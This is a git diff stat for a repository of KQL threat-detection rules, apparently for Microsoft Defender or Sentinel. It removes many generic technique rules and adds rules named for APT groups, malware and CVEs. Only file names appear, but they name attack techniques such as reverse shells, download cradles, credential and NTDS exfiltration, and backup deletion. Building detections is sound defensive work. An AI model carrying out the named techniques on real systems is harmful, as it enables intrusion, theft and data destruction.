...File_Download_Via_PresentationHost.EXE.kql | 7 - ...bitrary_File_Download_Via_Squirrel.EXE.kql | 8 - ...Arbitrary_MSI_Download_Via_Devinit.EXE.kql | 7 - ...ommand_Execution_Via_Settingcontent-Ms.kql | 7 - ...sembly_DLL_Creation_Via_AspNetCompiler.kql | 8 - Execution/Base64_MZ_Header_In_CommandLine.kql | 7 - ...y_Proxy_Execution_Via_Dotnet-Trace.EXE.kql | 7 - Execution/BloodHound_Collection_Files.kql | 7 - Execution/Blue_Mockingbird_-_Registry.kql | 7 - ...CLR_DLL_Loaded_Via_Office_Applications.kql | 7 - .../CMSTP_Execution_Process_Creation.kql | 7 - Execution/CMSTP_Execution_Registry_Event.kql | 7 - ...CMSTP_UAC_Bypass_via_COM_Object_Access.kql | 7 - Execution/CSExec_Service_File_Creation.kql | 7 - .../Certificate_Exported_Via_PowerShell.kql | 7 - ...werShell_Policies_to_an_Insecure_Level.kql | 7 - ...eadless_Execution_To_Mockbin_Like_Site.kql | 7 - ...ing_Space_Characters_Execution_Anomaly.kql | 9 - ...ith_Suspicious_URL_and_AppData_Strings.kql | 7 - ...omputer_Password_Change_Via_Ksetup.EXE.kql | 7 - ...ter_System_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...Conhost.exe_CommandLine_Path_Traversal.kql | 7 - ...ost_Spawned_By_Uncommon_Parent_Process.kql | 7 - Execution/Control_Panel_Items.kql | 7 - ...ureString_Cmdlet_Usage_Via_CommandLine.kql | 7 - ...Created_Files_by_Microsoft_Sync_Center.kql | 7 - ...ion_Form_Potentially_Suspicious_Parent.kql | 7 - ...quest_With_Potential_Custom_User-Agent.kql | 7 - Execution/DLL_Load_via_LSASS.kql | 7 - ..._of_PowerShell_Execution_via_Sqlps.exe.kql | 9 - ...ork_Connection_To_Non-Local_IP_Address.kql | 10 - ...mbly_DLL_Loaded_Via_Office_Application.kql | 7 - ...R_DLL_Loaded_By_Scripting_Applications.kql | 7 - ...Enable_Microsoft_Dynamic_Data_Exchange.kql | 7 - .../Exchange_PowerShell_Snap-Ins_Usage.kql | 7 - Execution/Execute_Code_with_Pester.bat.kql | 7 - ...Execute_Code_with_Pester.bat_as_Parent.kql | 7 - Execution/Execute_MSDT_Via_Answer_File.kql | 7 - ...Execute_Pcwrun.EXE_To_Leverage_Follina.kql | 7 - 
..._of_Powershell_Script_in_Public_Folder.kql | 7 - Execution/File_Decryption_Using_Gpg4win.kql | 7 - ...nload_From_IP_Based_URL_Via_CertOC.EXE.kql | 7 - ...File_Download_From_IP_URL_Via_Curl.EXE.kql | 7 - Execution/File_Encryption_Using_Gpg4win.kql | 7 - ...nsion_Created_By_An_Office_Application.kql | 7 - Execution/Forfiles_Command_Execution.kql | 10 - .../Fsutil_Behavior_Set_SymlinkEvaluation.kql | 9 - ...GAC_DLL_Loaded_Via_Office_Applications.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - ...ackTool_-_Covenant_PowerShell_Launcher.kql | 7 - .../HackTool_-_CrackMapExec_Execution.kql | 7 - ...Tool_-_CrackMapExec_Execution_Patterns.kql | 7 - ..._-_CrackMapExec_PowerShell_Obfuscation.kql | 7 - ..._-_Empire_PowerShell_Launch_Parameters.kql | 7 - .../HackTool_-_Impacket_Tools_Execution.kql | 7 - ..._-_Jlaive_In-Memory_Assembly_Execution.kql | 7 - Execution/HackTool_-_Koadic_Execution.kql | 7 - ...ial_Impacket_Lateral_Movement_Activity.kql | 7 - ...-_RedMimicry_Winnti_Playbook_Execution.kql | 7 - ...l_-_Sliver_C2_Implant_Activity_Pattern.kql | 7 - .../HackTool_-_Stracciatella_Execution.kql | 7 - Execution/HackTool_-_WinPwn_Execution.kql | 8 - ...ware_Model_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...Hidden_Powershell_in_Link_File_Pattern.kql | 7 - ...mputer_Zone_For_HTTP_Protocols_Via_CLI.kql | 8 - ..._Suspicious_Directories_-_ProcCreation.kql | 7 - ...cution_By_Program_Compatibility_Wizard.kql | 7 - Execution/Insecure_Transfer_Via_Curl.EXE.kql | 7 - ..._New_Package_Via_Winget_Local_Manifest.kql | 10 - .../Invoke-Obfuscation_CLIP+_Launcher.kql | 7 - ...nvoke-Obfuscation_COMPRESS_OBFUSCATION.kql | 7 - ...-Obfuscation_Obfuscated_IEX_Invocation.kql | 7 - .../Invoke-Obfuscation_STDIN+_Launcher.kql | 7 - ...Obfuscation_VAR++_LAUNCHER_OBFUSCATION.kql | 7 - .../Invoke-Obfuscation_VAR+_Launcher.kql | 7 - Execution/Invoke-Obfuscation_Via_Stdin.kql | 7 - Execution/Invoke-Obfuscation_Via_Use_Clip.kql | 7 - .../Invoke-Obfuscation_Via_Use_MSHTA.kql | 7 - 
.../Java_Running_with_Remote_Debugging.kql | 7 - Execution/Local_File_Read_Using_Curl.EXE.kql | 7 - ...On_User_Password_Change_Via_Ksetup.EXE.kql | 7 - Execution/MMC20_Lateral_Movement.kql | 7 - Execution/MSHTA_Suspicious_Execution_01.kql | 7 - ...d_PowerShell_Keywords_in_Command_Lines.kql | 7 - ...werShell_Commandlets_-_ProcessCreation.kql | 7 - ...ious_PowerShell_Scripts_-_FileCreation.kql | 7 - ...l_Add-In_Loaded_From_Uncommon_Location.kql | 7 - ..._Center_Suspicious_Network_Connections.kql | 7 - ...A_For_Outlook_Addin_Loaded_Via_Outlook.kql | 7 - .../Microsoft_Workflow_Compiler_Execution.kql | 7 - ...LL_RunHTMLApplication_Suspicious_Usage.kql | 8 - Execution/Net_WebClient_Casing_Anomalies.kql | 7 - ...k_Connection_Initiated_By_Eqnedt32.EXE.kql | 7 - ...k_Connection_Initiated_By_Regsvr32.EXE.kql | 7 - ...k_Connection_Initiated_Via_Notepad.EXE.kql | 10 - Execution/New_Application_in_AppCompat.kql | 7 - .../New_Process_Created_Via_Wmic.EXE.kql | 7 - ...l_Smart_Card_Created_Via_TpmVscMgr.EXE.kql | 7 - ...Interactive_PowerShell_Process_Spawned.kql | 7 - ...ted_Network_Connection_To_Non-Local_IP.kql | 10 - ...erator_Bloopers_Cobalt_Strike_Commands.kql | 7 - ...perator_Bloopers_Cobalt_Strike_Modules.kql | 7 - ...nnection_Initiated_By_Microsoft_Dialer.kql | 10 - ...k_Connection_To_Public_IP_Via_Winlogon.kql | 7 - ...eUnsafeClientMailRules_Setting_Enabled.kql | 7 - Execution/PCRE.NET_Package_Image_Load.kql | 7 - Execution/PCRE.NET_Package_Temp_Files.kql | 7 - ...oy_Remote_Adminstartion_Tool_Execution.kql | 7 - .../PSEXEC_Remote_Execution_File_Artefact.kql | 7 - Execution/PUA_-_AdvancedRun_Execution.kql | 7 - Execution/PUA_-_CsExec_Execution.kql | 7 - Execution/PUA_-_NSudo_Execution.kql | 7 - Execution/PUA_-_NirCmd_Execution.kql | 7 - ...PUA_-_NirCmd_Execution_As_LOCAL_SYSTEM.kql | 7 - .../PUA_-_Radmin_Viewer_Utility_Execution.kql | 7 - Execution/PUA_-_RunXCmd_Execution.kql | 7 - .../PUA_-_Wsudo_Suspicious_Execution.kql | 7 - ...nt_in_Public_Folder_Suspicious_Process.kql 
| 7 - Execution/Perl_Inline_Command_Execution.kql | 7 - Execution/Php_Inline_Command_Execution.kql | 7 - Execution/Potential_Adplus.EXE_Abuse.kql | 7 - ...rbitrary_Command_Execution_Via_FTP.EXE.kql | 7 - ...Arbitrary_File_Download_Via_Cmdl32.EXE.kql | 10 - ...inary_Impersonating_Sysinternals_Tools.kql | 7 - ...ial_Binary_Proxy_Execution_Via_Cdb.EXE.kql | 7 - ...otential_CobaltStrike_Process_Patterns.kql | 7 - ...trike_Service_Installations_-_Registry.kql | 8 - ...CommandLine_Path_Traversal_Via_Cmd.EXE.kql | 7 - .../Potential_Cookies_Session_Hijacking.kql | 7 - ...nload_Via_PowerShell_Invoke-WebRequest.kql | 7 - ...tration_Activity_Via_CommandLine_Tools.kql | 7 - ...tial_Discovery_Activity_Via_Dnscmd.EXE.kql | 7 - Execution/Potential_Dosfuscation_Activity.kql | 7 - ...ded_PowerShell_Patterns_In_CommandLine.kql | 7 - ...d_Via_MS-AppInstaller_Protocol_Handler.kql | 9 - ...wershell_Search_Order_Hijacking_-_Task.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...al_PowerShell_Command_Line_Obfuscation.kql | 7 - .../Potential_PowerShell_Downgrade_Attack.kql | 7 - ...hell_Obfuscation_Via_Reversed_Commands.kql | 7 - ...ntial_PowerShell_Obfuscation_Via_WCHAR.kql | 7 - ...ial_Powershell_ReverseShell_Connection.kql | 7 - ...duct_Class_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...al_Product_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...tential_RDP_Session_Hijacking_Activity.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...ger_Content_Execution_Via_WerFault.EXE.kql | 7 - .../Potential_Renamed_Rundll32_Execution.kql | 7 - ...ential_SMB_Relay_Attack_Tool_Execution.kql | 7 - ..._ShellDispatch.DLL_Functionality_Abuse.kql | 7 - ...er_Launch_From_Document_Reader_Process.kql | 8 - ...rvice_Path_Reconnaissance_Via_Wmic.EXE.kql | 7 - ...ial_Ursnif_Malware_Activity_-_Registry.kql | 7 - ...l_Movement_WmiPrvSE_Spawned_PowerShell.kql | 7 - ...Potential_WinAPI_Calls_Via_CommandLine.kql | 7 - ...Child_Process_Of_ClickOnce_Application.kql | 7 - 
...lly_Suspicious_Child_Process_Of_VsCode.kql | 7 - ...Suspicious_Child_Process_Of_WinRAR.EXE.kql | 7 - ...ious_Child_Process_of_KeyScrambler.exe.kql | 7 - ...cious_Electron_Application_CommandLine.kql | 7 - ...uspicious_Execution_Of_PDQDeployRunner.kql | 7 - ...File_Sharing_Domain_Via_PowerShell.EXE.kql | 7 - ..._Suspicious_PowerShell_Child_Processes.kql | 7 - ...tially_Suspicious_WebDAV_LNK_Execution.kql | 7 - ...Base64_Encoded_FromBase64String_Cmdlet.kql | 7 - .../PowerShell_Base64_Encoded_IEX_Cmdlet.kql | 7 - ...werShell_Base64_Encoded_Invoke_Keyword.kql | 7 - ...ase64_Encoded_Reflective_Assembly_Load.kql | 7 - .../PowerShell_Base64_Encoded_WMI_Classes.kql | 7 - ...e_DLL_Loaded_By_Non_PowerShell_Process.kql | 9 - Execution/PowerShell_DownloadFile.kql | 7 - Execution/PowerShell_Download_Pattern.kql | 7 - ...erShell_Download_and_Execution_Cradles.kql | 7 - ...With_Potential_Decryption_Capabilities.kql | 7 - ...rShell_Script_Execution_Policy_Enabled.kql | 7 - .../PowerShell_Script_Run_in_AppData.kql | 7 - Execution/PowerShell_Web_Download.kql | 7 - .../PowerShell_as_a_Service_in_Registry.kql | 7 - ...owershell_Inline_Execution_From_A_File.kql | 7 - .../PrinterNightmare_Mimikatz_Driver_Name.kql | 7 - ...ocess_Proxy_Execution_Via_Squirrel.EXE.kql | 8 - .../Process_Reconnaissance_Via_Wmic.EXE.kql | 7 - Execution/Proxy_Execution_Via_Wuauclt.EXE.kql | 7 - ...hild_Process_Execution_as_LOCAL_SYSTEM.kql | 7 - Execution/PsExec_Service_Execution.kql | 7 - Execution/PsExec_Service_File_Creation.kql | 7 - Execution/Psexec_Execution.kql | 7 - Execution/Python_Inline_Command_Execution.kql | 7 - .../Python_Spawning_Pretty_TTY_on_Windows.kql | 7 - Execution/Query_Usage_To_Exfil_Data.kql | 7 - .../Read_Contents_From_Stdin_Via_Cmd.EXE.kql | 7 - ...formance_Counter_Values_Via_Lodctr.EXE.kql | 7 - ..._DLL_Execution_With_Uncommon_Extension.kql | 7 - Execution/RemCom_Service_File_Creation.kql | 7 - ...With_Known_Revoked_Signing_Certificate.kql | 11 - 
...ScreenConnect_Remote_Command_Execution.kql | 7 - ...ss_Tool_-_ScreenConnect_Temporary_File.kql | 9 - .../Remote_DLL_Load_Via_Rundll32.EXE.kql | 7 - ...owerShell_Session_Host_Process_(WinRM).kql | 7 - ...Hosted_HTA_File_Executed_Via_Mshta.EXE.kql | 7 - Execution/Renamed_CURL.EXE_Execution.kql | 7 - Execution/Renamed_FTP.EXE_Execution.kql | 7 - Execution/Renamed_Jusched.EXE_Execution.kql | 7 - Execution/Renamed_NirCmd.EXE_Execution.kql | 7 - .../Renamed_PingCastle_Binary_Execution.kql | 7 - .../Renamed_PsExec_Service_Execution.kql | 7 - Execution/Ruby_Inline_Command_Execution.kql | 7 - ...ll_Script_from_Redirected_Input_Stream.kql | 7 - .../Rundll32_Execution_Without_Parameters.kql | 7 - Execution/Rundll32_Internet_Connection.kql | 7 - Execution/Rundll32_UNC_Path_Execution.kql | 7 - ...ent_Tools_PowerShell_Session_Detection.kql | 9 - ...heduled_Task_Creation_Via_Schtasks.EXE.kql | 7 - ...xecuting_Encoded_Payload_from_Registry.kql | 7 - ...d_Task_Executing_Payload_from_Registry.kql | 7 - ...Or_Modification_With_SYSTEM_Privileges.kql | 7 - .../Schtasks_From_Suspicious_Folders.kql | 7 - ...Script_Event_Consumer_Spawning_Process.kql | 7 - ...reter_Execution_From_Suspicious_Folder.kql | 7 - .../Service_Reconnaissance_Via_Wmic.EXE.kql | 11 - ...Type_Change_Via_PowerShell_Set-Service.kql | 7 - .../Service_StartupType_Change_Via_Sc.EXE.kql | 7 - ..._DLL_Execution_in_Suspicious_Directory.kql | 7 - .../Start_Windows_Service_Via_Net.EXE.kql | 7 - ...ectory_Spawned_From_Office_Application.kql | 7 - ...Suspicious_Child_Process_Of_BgInfo.EXE.kql | 7 - ...nd_Patterns_In_Scheduled_Task_Creation.kql | 7 - Execution/Suspicious_Csi.exe_Usage.kql | 7 - ...s_Electron_Application_Child_Processes.kql | 8 - ...Reflection_Assembly_Load_Function_Call.kql | 7 - ...icious_Encoded_PowerShell_Command_Line.kql | 7 - ...cious_Execution_Location_Of_Wermgr.EXE.kql | 7 - ...us_Execution_of_Powershell_with_Base64.kql | 7 - ..._Characteristics_Due_to_Missing_Fields.kql | 7 - 
.../Suspicious_File_Created_In_PerfLogs.kql | 7 - ...le_Creation_In_Uncommon_AppData_Folder.kql | 7 - ..._From_File_Sharing_Domain_Via_Curl.EXE.kql | 7 - ..._From_File_Sharing_Domain_Via_Wget.EXE.kql | 7 - ...ous_File_Download_From_IP_Via_Curl.EXE.kql | 7 - ...ous_File_Download_From_IP_Via_Wget.EXE.kql | 7 - ..._Download_From_IP_Via_Wget.EXE_-_Paths.kql | 7 - ...tion_From_Internet_Hosted_WebDav_Share.kql | 7 - ...cious_Greedy_Compression_Using_Rar.EXE.kql | 7 - Execution/Suspicious_HH.EXE_Execution.kql | 7 - Execution/Suspicious_HWP_Sub_Processes.kql | 7 - ...cious_Interactive_PowerShell_as_SYSTEM.kql | 7 - .../Suspicious_LOLBIN_AccCheckConsole.kql | 7 - ...picious_Microsoft_Office_Child_Process.kql | 7 - ...icious_Modification_Of_Scheduled_Tasks.kql | 10 - ...uspicious_Mshta.EXE_Execution_Patterns.kql | 7 - .../Suspicious_Outlook_Child_Process.kql | 7 - ...eToolBoxCmd.EXE_VM_State_Change_Script.kql | 7 - ...owerShell_Download_and_Execute_Pattern.kql | 7 - ...us_PowerShell_Encoded_Command_Patterns.kql | 7 - ...ious_PowerShell_IEX_Execution_Patterns.kql | 7 - ...picious_PowerShell_Parameter_Substring.kql | 7 - .../Suspicious_PowerShell_Parent_Process.kql | 7 - ...uspicious_Process_Created_Via_Wmic.EXE.kql | 7 - Execution/Suspicious_Program_Names.kql | 7 - Execution/Suspicious_RASdial_Activity.kql | 7 - ...nce_Activity_Via_GatherNetworkInfo.VBS.kql | 7 - ...ious_Remote_Child_Process_From_Outlook.kql | 7 - Execution/Suspicious_Runscripthelper.exe.kql | 7 - Execution/Suspicious_Scan_Loop_Network.kql | 7 - ...ed_Task_Creation_Involving_Temp_Folder.kql | 7 - ...Suspicious_Scheduled_Task_Name_As_GUID.kql | 7 - ...Scheduled_Task_Write_to_System32_Tasks.kql | 7 - ...ious_Schtasks_Execution_AppData_Folder.kql | 7 - ...uspicious_Schtasks_From_Env_Var_Folder.kql | 7 - ...sks_Schedule_Type_With_High_Privileges.kql | 7 - .../Suspicious_Schtasks_Schedule_Types.kql | 7 - ...ious_Script_Execution_From_Temp_Folder.kql | 7 - ...Suspicious_Spool_Service_Child_Process.kql | 7 - 
...ious_Use_of_CSharp_Interactive_Console.kql | 7 - ...ious_WMIC_Execution_Via_Office_Process.kql | 7 - .../Suspicious_WSMAN_Provider_Image_Loads.kql | 7 - ...icious_WindowsTerminal_Child_Processes.kql | 7 - .../Suspicious_WmiPrvSE_Child_Process.kql | 7 - ...picious_XOR_Encoded_PowerShell_Command.kql | 7 - Execution/Suspicious_ZipExec_Execution.kql | 7 - Execution/Sysprep_on_AppData_Folder.kql | 7 - ...And_Volume_Reconnaissance_Via_Wmic.EXE.kql | 10 - Execution/Tasks_Folder_Evasion.kql | 10 - .../UAC_Bypass_Using_IDiagnostic_Profile.kql | 7 - ...ypass_Using_IDiagnostic_Profile_-_File.kql | 7 - .../Uncommon_Child_Process_Of_Appvlp.EXE.kql | 11 - .../Uncommon_Child_Process_Of_BgInfo.EXE.kql | 7 - ...ommon_Child_Process_Of_Defaultpack.EXE.kql | 7 - ...Uncommon_Child_Processes_Of_SndVol.exe.kql | 7 - ..._One_Time_Only_Scheduled_Task_At_00_00.kql | 7 - .../Unusual_Parent_Process_For_Cmd.EXE.kql | 7 - ...ge_Of_Web_Request_Commands_And_Cmdlets.kql | 7 - ...Use_Of_The_SFTP.EXE_Binary_As_A_LOLBIN.kql | 7 - Execution/Use_of_FSharp_Interpreters.kql | 9 - Execution/Use_of_OpenConsole.kql | 7 - Execution/Use_of_Pcalua_For_Execution.kql | 7 - Execution/Use_of_Scriptrunner.exe.kql | 7 - .../Using_SettingSyncHost.exe_as_LOLBin.kql | 7 - .../VBA_DLL_Loaded_Via_Office_Application.kql | 7 - .../VMToolsd_Suspicious_Child_Process.kql | 7 - ...PressAnyKey_Arbitrary_Binary_Execution.kql | 7 - ...ejsTools_PressAnyKey_Renamed_Execution.kql | 7 - Execution/WMIC_Remote_Command_Execution.kql | 7 - Execution/WSL_Child_Process_Anomaly.kql | 7 - .../WScript_or_CScript_Dropper_-_File.kql | 7 - ...ab_Execution_From_Non_Default_Location.kql | 7 - Execution/Weak_or_Abused_Passwords_In_CLI.kql | 9 - ...le_File_Creation_By_Non-System_Process.kql | 7 - ...ix_Updates_Reconnaissance_Via_Wmic.EXE.kql | 7 - Execution/WmiPrvSE_Spawned_A_Process.kql | 7 - Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql | 7 - .../Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql | 7 - .../Wscript_Shell_Run_In_CommandLine.kql | 7 - 
...Process_Located_In_Suspicious_Location.kql | 8 - ...acting_Cab_Files_From_Suspicious_Paths.kql | 7 - Execution/Wusa_Extracting_Cab_Files.kql | 7 - ...mon_Locations_Via_PresentationHost.EXE.kql | 8 - ...rectory_Structure_Export_Via_Csvde.EXE.kql | 7 - ...ectory_Structure_Export_Via_Ldifde.EXE.kql | 7 - ..._Download_Via_ConfigSecurityPolicy.EXE.kql | 10 - ...n_To_Ngrok_Tunneling_Service_Initiated.kql | 10 - .../Compressed_File_Creation_Via_Tar.EXE.kql | 9 - ...Compressed_File_Extraction_Via_Tar.EXE.kql | 9 - ...rom_Or_To_Admin_Share_Or_Sysvol_Folder.kql | 7 - ...ltration_and_Tunneling_Tools_Execution.kql | 7 - .../Email_Exifiltration_Via_Powershell.kql | 7 - ...ports_Critical_Registry_Keys_To_a_File.kql | 7 - .../Exports_Registry_Key_To_a_File.kql | 7 - ...S_Data_Exfiltration_by_DataSvcUtil.exe.kql | 7 - ...ication_Initiated_To_Portmap.IO_Domain.kql | 7 - ...itiated_To_Cloudflared_Tunnels_Domains.kql | 9 - ...nection_Initiated_To_DevTunnels_Domain.kql | 8 - ...etwork_Connection_Initiated_To_Mega.nz.kql | 9 - ...d_To_Visual_Studio_Code_Tunnels_Domain.kql | 8 - Exfiltration/PUA_-_Rclone_Execution.kql | 7 - ...ed_Network__Connection_To_Ngrok_Domain.kql | 10 - Exfiltration/Rclone_Config_File_Creation.kql | 7 - ...ous_PowerShell_Mailbox_Export_to_Share.kql | 7 - ...cious_Redirection_to_Local_Admin_Share.kql | 7 - ...bDav_Client_Execution_Via_Rundll32.EXE.kql | 8 - Exfiltration/Tap_Installer_Execution.kql | 7 - ...bDav_Client_Execution_Via_Rundll32.EXE.kql | 9 - ...l_Cmdlets_Execution_-_ProccessCreation.kql | 7 - .../All_Backups_Deleted_Via_Wbadmin.EXE.kql | 10 - Impact/Backup_Files_Deleted.kql | 7 - ...onfiguration_Tampering_Via_Bcdedit.EXE.kql | 7 - ...Copy_From_VolumeShadowCopy_Via_Cmd.EXE.kql | 7 - Impact/Delete_All_Scheduled_Tasks.kql | 7 - Impact/Delete_Important_Scheduled_Task.kql | 7 - ...eleted_Data_Overwritten_Via_Cipher.EXE.kql | 10 - ..._Shadow_Copies_via_WMI_with_PowerShell.kql | 7 - Impact/Disable_Important_Scheduled_Task.kql | 7 - 
...e_Recovery_From_Backup_Via_Wbadmin.EXE.kql | 9 - Impact/Fsutil_Suspicious_Invocation.kql | 9 - ...f_RstrtMgr.DLL_By_A_Suspicious_Process.kql | 10 - ...Of_RstrtMgr.DLL_By_An_Uncommon_Process.kql | 10 - ..._Communication_With_Crypto_Mining_Pool.kql | 7 - ...or_CA_or_AuthRoot_Certificate_to_Store.kql | 7 - Impact/Portable_Gpg.EXE_Execution.kql | 7 - ...eration_Using_AD_Module_-_ProcCreation.kql | 7 - Impact/Potential_Crypto_Mining_Activity.kql | 7 - ...ile_Overwrite_Via_Sysinternals_SDelete.kql | 7 - ...are_Activity_Using_LegalNotice_Message.kql | 7 - ...esktop_Background_Change_Using_Reg.EXE.kql | 9 - ...Desktop_Background_Change_Via_Registry.kql | 9 - Impact/Registry_Disable_System_Restore.kql | 7 - Impact/Renamed_Gpg.EXE_Execution.kql | 7 - ...Renamed_Sysinternals_Sdelete_Execution.kql | 7 - ...e_Access_Via_Volume_Shadow_Copy_Backup.kql | 8 - ...tion_Using_Operating_Systems_Utilities.kql | 7 - Impact/Stop_Windows_Service_Via_Net.EXE.kql | 7 - ...ws_Service_Via_PowerShell_Stop-Service.kql | 7 - Impact/Stop_Windows_Service_Via_Sc.EXE.kql | 7 - ...ious_Creation_TXT_File_in_User_Desktop.kql | 7 - Impact/Suspicious_Execution_of_Shutdown.kql | 7 - ...cious_Execution_of_Shutdown_to_Log_Out.kql | 7 - Impact/Suspicious_Reg_Add_BitLocker.kql | 7 - ...ous_Volume_Shadow_Copy_VSS_PS.dll_Load.kql | 7 - ...ous_Volume_Shadow_Copy_Vssapi.dll_Load.kql | 7 - ...s_Volume_Shadow_Copy_Vsstrace.dll_Load.kql | 7 - ...Windows_Backup_Deleted_Via_Wbadmin.EXE.kql | 10 - ...ommand_Execution_Via_Settingcontent-Ms.kql | 7 - ...L_Help_HH.EXE_Suspicious_Child_Process.kql | 7 - .../ISO_File_Created_Within_Temp_Folders.kql | 7 - ..._Image_Mount_Indicator_in_Recent_Files.kql | 9 - Initial Access/Office_Macro_File_Creation.kql | 7 - ..._File_Creation_From_Suspicious_Process.kql | 7 - Initial Access/Office_Macro_File_Download.kql | 7 - ...rd_Provided_In_Command_Line_Of_Net.EXE.kql | 7 - .../Phishing_Pattern_ISO_in_Archive.kql | 7 - ..._Access_via_DLL_Search_Order_Hijacking.kql | 7 - 
...With_Known_Revoked_Signing_Certificate.kql | 11 - ...-_ScreenConnect_Installation_Execution.kql | 7 - ...reenConnect_Server_Web_Shell_Execution.kql | 7 - ...Viewer_Session_Started_On_Windows_Host.kql | 9 - .../Shell_Process_Spawned_by_Java.EXE.kql | 7 - ...Suspicious_Child_Process_Of_SQL_Server.kql | 7 - ...icious_Child_Process_Of_Veeam_Dabatase.kql | 7 - ...icious_Double_Extension_File_Execution.kql | 7 - ...xecution_From_Outlook_Temporary_Folder.kql | 7 - .../Suspicious_File_Drop_by_Exchange.kql | 7 - .../Suspicious_HH.EXE_Execution.kql | 7 - .../Suspicious_HWP_Sub_Processes.kql | 7 - ...SExchangeMailboxReplication_ASPX_Write.kql | 7 - ...icious_Microsoft_OneNote_Child_Process.kql | 7 - ...spicious_Processes_Spawned_by_Java.EXE.kql | 7 - .../Suspicious_Processes_Spawned_by_WinRM.kql | 7 - ...s_Shells_Spawn_by_Java_Utility_Keytool.kql | 7 - .../Terminal_Service_Process_Spawn.kql | 7 - .../Unusual_Child_Process_of_dns.exe.kql | 7 - .../Unusual_File_Deletion_by_Dns.exe.kql | 7 - .../Unusual_File_Modification_by_dns.exe.kql | 7 - ...ows_Registry_Trust_Record_Modification.kql | 7 - .../apt31_judgement_panda_activity.kql | 12 + .../conti_ntds_exfiltration_command.kql | 10 + ...e_database_dumping_activity_via_sqlcmd.kql | 10 + ..._exe_file_creation_by_uncommon_process.kql | 14 ++ .../pandemic_registry_key.kql | 10 + ...cxdesktopapp_beaconing_activity_netcon.kql | 12 + ...eamer_rat_loading_net_executable_image.kql | 11 + ...ulnerability_cve_2025_33053_image_load.kql | 13 + .../potential_pikabot_c2_activity.kql | 14 ++ ...picious_child_process_of_3cxdesktopapp.kql | 10 + .../Credential Access/gallium_iocs.kql | 10 + ..._russian_apt_credential_theft_activity.kql | 12 + ..._file_potential_cve_2025_24054_exploit.kql | 15 ++ ...ishing_campaign_commandline_indicators.kql | 12 + ...2018_phishing_campaign_file_indicators.kql | 12 + .../apt_privatelog_image_load_pattern.kql | 12 + .../blue_mockingbird_registry.kql | 10 + ...d_sleet_apt_dll_sideloading_indicators.kql | 12 + 
...t_apt_scheduled_task_creation_registry.kql | 11 + ...ed_by_svr_for_graphicalproton_backdoor.kql | 10 + ...ation_group_dll_u_export_function_load.kql | 12 + ...lden_chickens_deployment_via_ocx_files.kql | 10 + .../exploit_for_cve_2015_1641.kql | 10 + .../flowcloud_registry_markers.kql | 14 ++ ...st_blizzard_apt_file_creation_activity.kql | 14 ++ ...t_javascript_constrained_file_creation.kql | 14 ++ ...blizzard_apt_process_creation_activity.kql | 12 + ...ingle_digit_dll_execution_via_rundll32.kql | 10 + ...ka_backdoor_execution_via_rundll32_exe.kql | 11 + .../lazarus_apt_dll_sideloading_activity.kql | 12 + .../lazarus_system_binary_masquerading.kql | 12 + ..._dll_load_by_compromised_3cxdesktopapp.kql | 12 + .../notpetya_ransomware_activity.kql | 10 + ...l_extension_execution_via_rundll32_exe.kql | 11 + ...ushroom_dll_load_activity_via_regsvr32.kql | 10 + ...al_compromised_3cxdesktopapp_execution.kql | 12 + ...promised_3cxdesktopapp_update_activity.kql | 10 + ...tial_devil_bait_malware_reconnaissance.kql | 12 + ...potential_devil_bait_related_indicator.kql | 12 + .../potential_dridex_activity.kql | 12 + .../potential_emotet_rundll32_execution.kql | 10 + .../potential_empiremonkey_activity.kql | 12 + ...guineapig_goolgeupdate_process_anomaly.kql | 10 + ...al_kapeka_decrypted_backdoor_indicator.kql | 12 + ...ial_ke3chang_tidepool_malware_activity.kql | 10 + .../potential_muddywater_apt_activity.kql | 12 + ...cious_command_combinations_via_cmd_exe.kql | 13 + .../potential_qakbot_rundll32_execution.kql | 12 + ...raspberry_robin_cpl_execution_activity.kql | 12 + .../ps_exe_renamed_sysinternals_tool.kql | 12 + .../qakbot_regsvr32_calc_pattern.kql | 12 + .../qakbot_rundll32_exports_execution.kql | 12 + ..._rundll32_fake_dll_extension_execution.kql | 12 + ...stealer_module_launch_via_rundll32_exe.kql | 10 + ...t_slashandgrab_exploitation_indicators.kql | 11 + ..._sieve_malware_file_indicator_creation.kql | 12 + .../sofacy_trojan_loader_activity.kql | 10 + 
...do_privilege_escalation_cve_2019_14287.kql | 12 + ...ous_razerinstaller_explorer_subprocess.kql | 12 + ...ue_of_msdt_in_registry_cve_2022_30190_.kql | 10 + ...mpressed_files_from_temp_sh_using_wget.kql | 10 + ...file_from_untrusted_direct_ip_via_wget.kql | 10 + ...l_certificate_exfiltration_via_openssl.kql | 10 + .../potential_pikabot_discovery_activity.kql | 14 ++ .../Execution/adwind_rat_jrat.kql | 10 + ..._spooler_exploitation_filename_pattern.kql | 10 + .../cve_2021_26858_exchange_exploitation.kql | 13 + ...ve_2021_44077_poc_default_dropped_file.kql | 12 + ...22_24527_microsoft_connected_cache_lpe.kql | 10 + ...icious_confluence_child_process_linux_.kql | 13 + ...ious_confluence_child_process_windows_.kql | 11 + ...tempt_suspicious_double_extension_file.kql | 10 + ...ttempt_suspicious_winrar_child_process.kql | 12 + ...tential_exploitation_rev_file_creation.kql | 12 + ...kgate_autoit3_exe_execution_parameters.kql | 15 ++ ...op_darkgate_loader_in_c_temp_directory.kql | 12 + .../Execution/darkside_ransomware_pattern.kql | 12 + ...ond_sleet_apt_file_creation_indicators.kql | 12 + ..._sleet_apt_process_activity_indicators.kql | 12 + .../droppers_exploiting_cve_2017_11882.kql | 10 + .../Execution/elise_backdoor_activity.kql | 12 + .../emotet_loader_execution_via_lnk_file.kql | 14 ++ .../Execution/exploit_for_cve_2017_0261.kql | 12 + .../Execution/exploit_for_cve_2017_8759.kql | 10 + ...25_59287_wsus_suspicious_child_process.kql | 14 ++ ...e_2020_1472_execution_of_zerologon_poc.kql | 10 + .../fakeupdates_socgholish_activity.kql | 12 + .../file_creation_related_to_rat_clients.kql | 13 + .../Execution/fireball_archer_install.kql | 10 + .../goofy_guineapig_backdoor_ioc.kql | 12 + .../greenbug_espionage_group_indicators.kql | 12 + .../griffon_malware_attack_pattern.kql | 12 + 